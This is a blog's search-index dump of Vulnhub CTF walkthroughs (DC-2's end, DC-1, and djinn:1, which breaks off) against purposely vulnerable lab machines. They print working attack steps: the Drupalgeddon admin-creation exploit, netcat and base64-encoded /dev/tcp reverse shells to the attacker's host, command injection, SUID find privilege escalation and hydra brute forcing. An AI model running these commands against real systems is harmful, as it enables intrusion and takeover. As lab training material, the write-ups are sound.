probably won’t work, so instead, maybe you just need to be cewl. More passwords is always better, but sometimes you just can’t win them all. Log in as one to see the next flag. If you can’t find it, log in as another. Flag 2 Login is tom or jerry and check Pages \u0026gt; Flag 2\nIf you can\u0026#39;t exploit WordPress and take a shortcut, there is another way. Hope you found another entry point. Flag 3 /home/tom/flag3.txt\nPoor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes. Flag 4 /home/jerry/flag4.txt\nGood to see that you\u0026#39;ve made it this far - but you\u0026#39;re not home yet. You still need to get the final flag (the only flag that really counts!!!). No hints here - you\u0026#39;re on your own now. :-) Go on - git outta here!!!! Final Flag /root/final-flag.txt\n__ __ _ _ _ _ / / /\\ \\ \\___| | | __| | ___ _ __ ___ / \\ \\ \\/ \\/ / _ \\ | | / _` |/ _ \\| \u0026#39;_ \\ / _ \\/ / \\ /\\ / __/ | | | (_| | (_) | | | | __/\\_/ \\/ \\/ \\___|_|_| \\__,_|\\___/|_| |_|\\___\\/ Congratulatons!!! A special thanks to all those who sent me tweets and provided me with feedback - it\u0026#39;s all greatly appreciated. If you enjoyed this CTF, send me a tweet via @DCAU7. Final thoughts This machine was real fun! I learned some new tools and ways to start shells. Never ran a shell through an editor like vi or less before.\ncewl was completely new for me and I already think about how to use it more often.\nThanks to @DCAU7 ! Seeing forward to the other machines in the DC Series ","excerpt":"\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://www.vulnhub.com/entry/dc-2,311/\" target=\"_blank\"\u003eLink to Vulnhub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.five86.com/\" target=\"_blank\"\u003eDC Challenges \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eOriginal Description\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eMuch like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/20200105-walkthrough-dc2/","title":"Walkthrough: Vulnhub - DC: 2"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/wpscan/","title":"WPScan"},{"body":" Link to Vulnhub DC Challenges Original Description\nDC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.\nIt was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.\nTo successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.\nThere are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.\nThere are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.\nDepending on your skill level, you may be able to skip finding most of these flags and go straight for root.\nBeginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.\nRecon root@kali:~# nmap -p- -A 10.128.1.152 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-04 12:44 EST Nmap scan report for DC-1.stoeps.lab (10.128.1.152) Host is up (0.00063s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) | ssh-hostkey: | 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA) | 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA) |_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Debian)) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.2.22 (Debian) |_http-title: Welcome to Drupal Site | Drupal Site 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 42642/tcp status | 100024 1 49668/udp status | 100024 1 57477/tcp6 status |_ 100024 1 57545/udp6 status 42642/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:76:3D:59 (VMware) Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.16 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Drupal searchsploit drupal 7 ------------------------------------------------------------------------------------------------------------------ Exploit Title | Path (/usr/share/exploitdb/) ------------------------------------------------------------------------------------------------------------------ Drupal 7.0 \u0026lt; 7.31 - \u0026#39;Drupalgeddon\u0026#39; SQL Injection (Add Admin User) | exploits/php/webapps/34992.py Create Admin account\nroot@kali:~/vulnhub/dc1# cp /usr/share/exploitdb/exploits/php/webapps/34992.py . root@kali:~/vulnhub/dc1# dos2unix 34992.py root@kali:~/vulnhub/dc1# ./34992.py -t http://10.128.1.152 -u stoeps -p pass ... [!] VULNERABLE! [!] Administrator user created! [*] Login: stoeps [*] Pass: pass [*] Url: http://10.128.1.152/?q=node\u0026amp;destination=node Now we can login to the drupal site and install modules, change settings and so on.\nGoto: http://10.128.1.152/node/2#overlay-context=shell\u0026overlay=admin/modules Install https://www.drupal.org/project/shell Use the remote link to .tar.gz Open Drupal Shell: http://10.128.1.152/shell Opening netcat shell Starting on Kali\nnc -nlvp 7777 Start nc in the Drupal shell\nnc -e /bin/bash 10.128.1.154 7777 Use the Kali IP here Then get a real tty\npython -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/sh\u0026#34;)\u0026#39; Grab the flags through netcat shell and browser Flag1 www-data@DC-1:/var/www$ cat flag1.txt cat flag1.txt Every good CMS needs a config file - and so do you. Flag2 www-data@DC-1:/var/www/sites/default$ cat set cat settings.php \u0026lt;?php /** * * flag2 * Brute force and dictionary attacks aren\u0026#39;t the * only ways to gain access (and you WILL need access). * What can you do with these credentials? * */ $databases = array ( \u0026#39;default\u0026#39; =\u0026gt; array ( \u0026#39;default\u0026#39; =\u0026gt; array ( \u0026#39;database\u0026#39; =\u0026gt; \u0026#39;drupaldb\u0026#39;, \u0026#39;username\u0026#39; =\u0026gt; \u0026#39;dbuser\u0026#39;, \u0026#39;password\u0026#39; =\u0026gt; \u0026#39;R0ck3t\u0026#39;, \u0026#39;host\u0026#39; =\u0026gt; \u0026#39;localhost\u0026#39;, \u0026#39;port\u0026#39; =\u0026gt; \u0026#39;\u0026#39;, \u0026#39;driver\u0026#39; =\u0026gt; \u0026#39;mysql\u0026#39;, \u0026#39;prefix\u0026#39; =\u0026gt; \u0026#39;\u0026#39;, ), ), ); ... Connect To MySQL Database From Command Line Guide We can extract the user and passwords from mysql db, then crack with John the ripper, but not needed as we created our own admin account. I found nothing interesting in the database.\nFlag3 Article on the dashboard within Drupal.\nhttp://10.128.1.152/node/2#overlay-context=shell Special PERMS will help FIND the passwd - but you\u0026#39;ll need to -exec that command to work out how to get what\u0026#39;s in the shadow. Flag4 /home/flag4/flag4.txt\n\u0026gt; cat /home/flag4/flag4.txt Can you use this same method to find or access the flag in root? Probably. But perhaps it\u0026#39;s not that easy. Or maybe it is? Flag4 was readable for the user www-data, so no need to crack the password from /etc/shadow.\nFinal Flag www-data@DC-1:/var/www/sites/default$ find / -perm /4000 find / -perm /4000 /bin/mount /bin/ping /bin/su /bin/ping6 /bin/umount /usr/bin/at /usr/bin/chsh /usr/bin/passwd /usr/bin/newgrp /usr/bin/chfn /usr/bin/gpasswd /usr/bin/procmail /usr/bin/find /usr/sbin/exim4 /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /sbin/mount.nfs www-data@DC-1:/var/www/sites/default$ ls -l /usr/bin/find ls -l /usr/bin/find bash-4.2$ find . -exec \u0026#39;/bin/sh\u0026#39; \\; find . -exec \u0026#39;/bin/sh\u0026#39; \\; # whoami whoami root # id id uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data) # cd /root cd /root # ls ls thefinalflag.txt find can be used with -exec # cat thefinalflag.txt cat thefinalflag.txt Well done!!!! Hopefully you\u0026#39;ve enjoyed this and learned some new skills. You can let me know what you thought of this little journey by contacting me via Twitter - @DCAU7 We’re done! Funny vulnhub machine which can be solved in a short time. Seeing forward to the other eight machines of that series. Thanks @DCAU7 ","excerpt":"\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://www.vulnhub.com/entry/dc-1,292/\" target=\"_blank\"\u003eLink to Vulnhub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.five86.com/\" target=\"_blank\"\u003eDC Challenges \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eOriginal Description\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eDC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.\u003c/p\u003e\n\u003cp\u003eIt was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/20200104-walkthrough-dc1/","title":"Walkthrough: Vulnhub - DC: 1"},{"body":" djinn:1 is the next machine I want to break in. Level: Beginner-Intermediate flags: user.txt and root.txt Format: Virtual Machine (Virtualbox - OVA) Operating System: Linux The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You’ll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.\nRecon Djinn shows its actual IP address on the login prompt, so there is no need to run nmap -sn or netdiscover.\nnmap -A 192.168.14.106 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-30 15:32 EST Nmap scan report for 192.168.14.106 Host is up (0.00078s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt | -rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt |_-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.14.107 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp filtered ssh MAC Address: 08:00:27:53:CE:19 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Unix TRACEROUTE HOP RTT ADDRESS 1 0.78 ms 192.168.14.106 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.51 seconds FTP Anonymous login allowed\nSSH is filtered\nNot a lot, so let’s try all ports.\nroot@kali:~# nmap -A -p- 192.168.14.106 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-30 15:43 EST Nmap scan report for 192.168.14.106 Host is up (0.00066s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt | -rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt |_-rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.14.107 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp filtered ssh 1337/tcp open waste? | fingerprint-strings: | NULL: | ____ _____ _ | ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ | \\x20/ _ \\x20 | | | | \u0026#39;_ ` _ \\x20/ _ \\n| |_| | (_| | | | | | | __/ | | | | | | | | | __/ | ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___| | Let\u0026#39;s see how good you are with simple maths | Answer my questions 1000 times and I\u0026#39;ll give you your gift. | \u0026#39;-\u0026#39;, 8) | RPCCheck: | ____ _____ _ | ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ | \\x20/ _ \\x20 | | | | \u0026#39;_ ` _ \\x20/ _ \\n| |_| | (_| | | | | | | __/ | | | | | | | | | __/ | ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___| | Let\u0026#39;s see how good you are with simple maths | Answer my questions 1000 times and I\u0026#39;ll give you your gift. |_ \u0026#39;*\u0026#39;, 6) 7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+) |_http-server-header: Werkzeug/0.16.0 Python/2.7.15+ |_http-title: Lost in space 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port1337-TCP:V=7.80%I=7%D=12/30%Time=5E0A619F%P=x86_64-pc-linux-gnu%r(N SF:ULL,1BC,\u0026#34;\\x20\\x20____\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20_____\\x20_\\x20\\x20\\x20\\x2 SF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\\x20/\\x20___\\|\\x20__ SF:\\x20_\\x20_\\x20__\\x20___\\x20\\x20\\x20___\\x20\\x20\\|_\\x20\\x20\\x20_\\(_\\)_\\x2 SF:0__\\x20___\\x20\\x20\\x20___\\x20\\n\\|\\x20\\|\\x20\\x20_\\x20/\\x20_`\\x20\\|\\x20\u0026#39;_ SF:\\x20`\\x20_\\x20\\\\\\x20/\\x20_\\x20\\\\\\x20\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\u0026#39;_\\ SF:x20`\\x20_\\x20\\\\\\x20/\\x20_\\x20\\\\\\n\\|\\x20\\|_\\|\\x20\\|\\x20\\(_\\|\\x20\\|\\x20\\| SF:\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\x20__/\\x20\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20 SF:\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\x20__/\\n\\x20\\\\____\\|\\\\__,_\\|_\\|\\x20\\|_\\| SF:\\x20\\|_\\|\\\\___\\|\\x20\\x20\\x20\\|_\\|\\x20\\|_\\|_\\|\\x20\\|_\\|\\x20\\|_\\|\\\\___\\|\\ SF:n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\ SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20 SF:\\n\\nLet\u0026#39;s\\x20see\\x20how\\x20good\\x20you\\x20are\\x20with\\x20simple\\x20math SF:s\\nAnswer\\x20my\\x20questions\\x201000\\x20times\\x20and\\x20I\u0026#39;ll\\x20give\\x2 SF:0you\\x20your\\x20gift\\.\\n\\(3,\\x20\u0026#39;-\u0026#39;,\\x208\\)\\n\u0026gt;\\x20\u0026#34;)%r(RPCCheck,1BC,\u0026#34;\\x SF:20\\x20____\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\ SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20_____\\x20_\\x20\\x20\\x20\\x20\\x20\\x20\\x SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\\x20/\\x20___\\|\\x20__\\x20_\\x20_\\ SF:x20__\\x20___\\x20\\x20\\x20___\\x20\\x20\\|_\\x20\\x20\\x20_\\(_\\)_\\x20__\\x20___\\ SF:x20\\x20\\x20___\\x20\\n\\|\\x20\\|\\x20\\x20_\\x20/\\x20_`\\x20\\|\\x20\u0026#39;_\\x20`\\x20_\\ SF:x20\\\\\\x20/\\x20_\\x20\\\\\\x20\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\u0026#39;_\\x20`\\x20_\\x SF:20\\\\\\x20/\\x20_\\x20\\\\\\n\\|\\x20\\|_\\|\\x20\\|\\x20\\(_\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\ SF:|\\x20\\|\\x20\\|\\x20\\x20__/\\x20\\x20\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x20\\|\\x2 SF:0\\|\\x20\\|\\x20\\|\\x20\\x20__/\\n\\x20\\\\____\\|\\\\__,_\\|_\\|\\x20\\|_\\|\\x20\\|_\\|\\\\ SF:___\\|\\x20\\x20\\x20\\|_\\|\\x20\\|_\\|_\\|\\x20\\|_\\|\\x20\\|_\\|\\\\___\\|\\n\\x20\\x20\\x SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\ SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20 SF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\n\\nLet\u0026#39;s\\x SF:20see\\x20how\\x20good\\x20you\\x20are\\x20with\\x20simple\\x20maths\\nAnswer\\x SF:20my\\x20questions\\x201000\\x20times\\x20and\\x20I\u0026#39;ll\\x20give\\x20you\\x20you SF:r\\x20gift\\.\\n\\(7,\\x20\u0026#39;\\*\u0026#39;,\\x206\\)\\n\u0026gt;\\x20\u0026#34;); MAC Address: 08:00:27:53:CE:19 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Unix TRACEROUTE HOP RTT ADDRESS 1 0.66 ms 192.168.14.106 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 102.76 seconds That looks more interesting. So let’s start from the top.\nFTP ftp 192.168.14.106 Connected to 192.168.14.106. 220 (vsFTPd 3.0.3) Name (192.168.14.106:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp\u0026gt; ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 11 Oct 20 23:54 creds.txt -rw-r--r-- 1 0 0 128 Oct 21 00:23 game.txt -rw-r--r-- 1 0 0 113 Oct 21 00:23 message.txt 226 Directory send OK. ftp\u0026gt; get creds.txt local: creds.txt remote: creds.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for creds.txt (11 bytes). 226 Transfer complete. 11 bytes received in 0.02 secs (0.6338 kB/s) ftp\u0026gt; get game.txt local: game.txt remote: game.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for game.txt (128 bytes). 226 Transfer complete. 128 bytes received in 0.02 secs (7.6252 kB/s) ftp\u0026gt; get message.txt local: message.txt remote: message.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for message.txt (113 bytes). 226 Transfer complete. 113 bytes received in 0.02 secs (7.1573 kB/s) Connect as user anonymous\nno password\nFiles content I replace cat with bat . I like the output and so I create an alias in the .bashrc\nalias cat='bat'\nroot@kali:~/djinn# cat creds.txt ───────┬────────────────────────────────────────────────────────────────────────────────────────────────── │ File: creds.txt ───────┼────────────────────────────────────────────────────────────────────────────────────────────────── 1 │ nitu:81299 ───────┴────────────────────────────────────────────────────────────────────────────────────────────────── root@kali:~/djinn# cat game.txt ───────┬────────────────────────────────────────────────────────────────────────────────────────────────── │ File: game.txt ───────┼────────────────────────────────────────────────────────────────────────────────────────────────── 1 │ oh and I forgot to tell you I\u0026#39;ve setup a game for you on port 1337. See if you can reach to the 2 │ final level and get the prize. ───────┴────────────────────────────────────────────────────────────────────────────────────────────────── root@kali:~/djinn# cat message.txt ───────┬────────────────────────────────────────────────────────────────────────────────────────────────── │ File: message.txt ───────┼────────────────────────────────────────────────────────────────────────────────────────────────── 1 │ @nitish81299 I am going on holidays for few days, please take care of all the work. 2 │ And don\u0026#39;t mess up anything. ───────┴────────────────────────────────────────────────────────────────────────────────────────────────── Port 1337 Opening with netcat:\nnc 192.168.14.106 1337 ____ _____ _ / ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ | | _ / _` | \u0026#39;_ ` _ \\ / _ \\ | | | | \u0026#39;_ ` _ \\ / _ \\ | |_| | (_| | | | | | | __/ | | | | | | | | | __/ \\____|\\__,_|_| |_| |_|\\___| |_| |_|_| |_| |_|\\___| Let\u0026#39;s see how good you are with simple maths Answer my questions 1000 times and I\u0026#39;ll give you your gift. (3, \u0026#39;*\u0026#39;, 1) \u0026gt; So we get a math equation to solve here and the message says we need to solve 1000 of them.\nSolve with pwntools A good way to solve such network games is using Python and pwntools .\nInstall pwntools with Python 3 (I use Kali Linux 2019.4): Installing pwntools directly with pip3 ran into an error. The master-branch does not fully support Python 3.\napt-get update apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3 -m pip install --upgrade pip python3 -m pip install --upgrade git+https://github.com/Gallopsled/pwntools.git@dev3 Solution mathsolve.py\n#!/usr/bin/env python3 from pwn import * c = remote(\u0026#39;192.168.14.106\u0026#39;,1337) c.recvuntil(\u0026#34;\\n\\n\u0026#34;, drop=True) # Loop 1000 times for i in range(1001): # read from ( to , c.recvuntil(\u0026#34;(\u0026#34;, drop=True) int1 = c.recvuntil(\u0026#34;,\u0026#34;, drop=True) # read from \u0026#39; to , c.recvuntil(\u0026#34;\u0026#39;\u0026#34;, drop=True) mathsym = c.recvuntil(\u0026#34;\u0026#39;\u0026#34;, drop=True) # read from , to ) c.recvuntil(\u0026#34;, \u0026#34;, drop=True) int2 = c.recvuntil(\u0026#34;)\u0026#34;, drop=True) # calculate equation equation = int1+mathsym+int2 print(str(i)+\u0026#34;th answer= \u0026#34;+str(equation)) # send answer c.sendlineafter(\u0026#39;\u0026gt;\u0026#39;,equation) c.interactive() ➜ chmod +x mathsolve.py ➜ ./mathsolve.py ... 999th answer= b\u0026#39;1+6\u0026#39; 1000th answer= b\u0026#39;6*8\u0026#39; [*] Switching to interactive mode Here is your gift, I hope you know what to do with it: 1356, 6784, 3409 [*] Got EOF while reading in interactive Looks like a sequence to port knocking.\nSSH Check ssh port\n➜ nmap -p22 192.168.14.106 PORT STATE SERVICE 22/tcp filtered ssh MAC Address: 08:00:27:AD:EB:9A (Oracle VirtualBox virtual NIC) Install knockd\n➜ apt install knockd Try to open the ssh port\n➜ knock 192.168.14.106 1356 6784 3409 Check ssh port again\n➜ nmap -p22 192.168.14.106 PORT STATE SERVICE 22/tcp open ssh MAC Address: 08:00:27:AD:EB:9A (Oracle VirtualBox virtual NIC) So the port is open. I tried to connect with the credentials found on the anonymous ftp login, but wasn’t successful. Damn lot of fun, but still not able to connect.\n➜ hydra -C creds.txt -u 192.168.14.106 ssh [DATA] max 1 task per 1 server, overall 1 task, 1 login try, ~1 try per task [DATA] attacking ssh://192.168.14.106:22/ 1 of 1 target completed, 0 valid passwords found I tried several combinations, with user nitish like mentioned in the message.txt. Loaded a larger wordlist for passwords, but wasn’t successful.\nPort 7331 Accessing http://192.168.14.106:7331 opens a web page. Let’s digg into that.\ngobuster\n➜ gobuster dir -w /usr/share/wordlists/dirbuster/directories.jbrofuzz -u http://192.168.14.106:7331 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.14.106:7331 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directories.jbrofuzz [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2019/12/31 08:18:56 Starting gobuster =============================================================== [ERROR] 2019/12/31 08:18:56 [!] parse http://192.168.14.106:7331/%: invalid URL escape \u0026#34;%\u0026#34; /?? (Status: 200) /genie (Status: 200) /wish (Status: 200) =============================================================== 2019/12/31 08:20:22 Finished With /wish we can execute commands on the webserver and get some response in the black background of the image of /genie.\nTo see it little bit easier, I copied the request as cUrl command from browser devtools:\n➜ curl -L \u0026#39;http://192.168.14.106:7331/wish\u0026#39; \\ -H \u0026#39;User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0\u0026#39; \\ -H \u0026#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#39; \\ --compressed -H \u0026#39;Content-Type: application/x-www-form-urlencoded\u0026#39; \\ -H \u0026#39;Origin: http://192.168.14.106:7331\u0026#39; -H \u0026#39;DNT: 1\u0026#39; -H \u0026#39;Connection: keep-alive\u0026#39; \\ -H \u0026#39;Referer: http://192.168.14.106:7331/wish\u0026#39; -H \u0026#39;Upgrade-Insecure-Requests: 1\u0026#39; \\ -H \u0026#39;Pragma: no-cache\u0026#39; -H \u0026#39;Cache-Control: no-cache\u0026#39; \\ --data \u0026#34;cmd=ls\u0026#34; ... \u0026lt;p\u0026gt; app.py app.pyc static templates \u0026lt;/p\u0026gt; ... Testing with ls / and some other commands, end with:\n\u0026lt;p\u0026gt; Wrong choice of words \u0026lt;/p\u0026gt; I tried several remote shell commands here, but wasn’t successful. Raj Chandel’s Blog gave me the idea to do a base64 conversion of the remote shell.\nSolving it on the commandline without a webservice is possible with curl and some commandlinefu:\n➜ curl \u0026#39;http://192.168.14.106:7331/wish\u0026#39; \\ -H \u0026#39;User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0\u0026#39; \\ -H \u0026#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#39; \\ -H \u0026#39;Accept-Language: en-US,en;q=0.7,de;q=0.3\u0026#39; --compressed \\ -H \u0026#39;Content-Type: application/x-www-form-urlencoded\u0026#39; \\ -H \u0026#39;Origin: http://192.168.14.106:7331\u0026#39; \\ -H \u0026#39;DNT: 1\u0026#39; -H \u0026#39;Connection: keep-alive\u0026#39; -H \u0026#39;Referer: http://192.168.14.106:7331/wish\u0026#39; \\ -H \u0026#39;Upgrade-Insecure-Requests: 1\u0026#39; -H \u0026#39;Pragma: no-cache\u0026#39; -H \u0026#39;Cache-Control: no-cache\u0026#39; \\ --data-urlencode \\ \u0026#34;cmd=echo $(echo \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.14.107/8080 0\u0026gt;\u0026amp;1\u0026#39; | base64) | base64 -d | bash\u0026#34; use --data-urlencode instead of --data Raj takes the remote shell command bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.14.107/8080 0\u0026gt;\u0026amp;1 and encode it through https://www.base64encode.org/ , but we can get the same result with\nCommandline base64 encode\necho \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.14.107/8080 0\u0026gt;\u0026amp;1\u0026#39; | base64 Now let’s connect this on the console. $() runs the command in parantheses first, so this adds the base64 encoded string,\necho $(echo \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.14.107/8080 0\u0026gt;\u0026amp;1\u0026#39; | base64) | base64 -d | bash is the same as:\necho YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0LjEwNy84MDgwIDA+JjEK | base64 -d | bash but we can easier change IP or port. Switching the curl option from --data to --data-urlencode converts the command into echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0LjEwNy84MDgwIDA%2BJjEK%20%7C%20base64%20-d%20%7C%20bash.\nBefore running our curl command start the netcat listener:\nnc -nlvp 8080 listening on [any] 8080 ... When we now run the curl command, we get a shell in netcat.\nRemote shell nc -nlvp 8080 listening on [any] 8080 ... connect to [192.168.14.107] from (UNKNOWN) [192.168.14.106] 44802 bash: cannot set terminal process group (740): Inappropriate ioctl for device bash: no job control in this shell www-data@djinn:/opt/80$ python -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; www-data@djinn:/opt/80$ ls ls app.py app.pyc static templates www-data@djinn:/opt/80$ cat app.py | grep CREDS cat app.py | grep nit CREDS = \u0026#34;/home/nitish/.dev/creds.txt\u0026#34; www-data@djinn:/opt/80$ cd /home/nitish/.dev cd 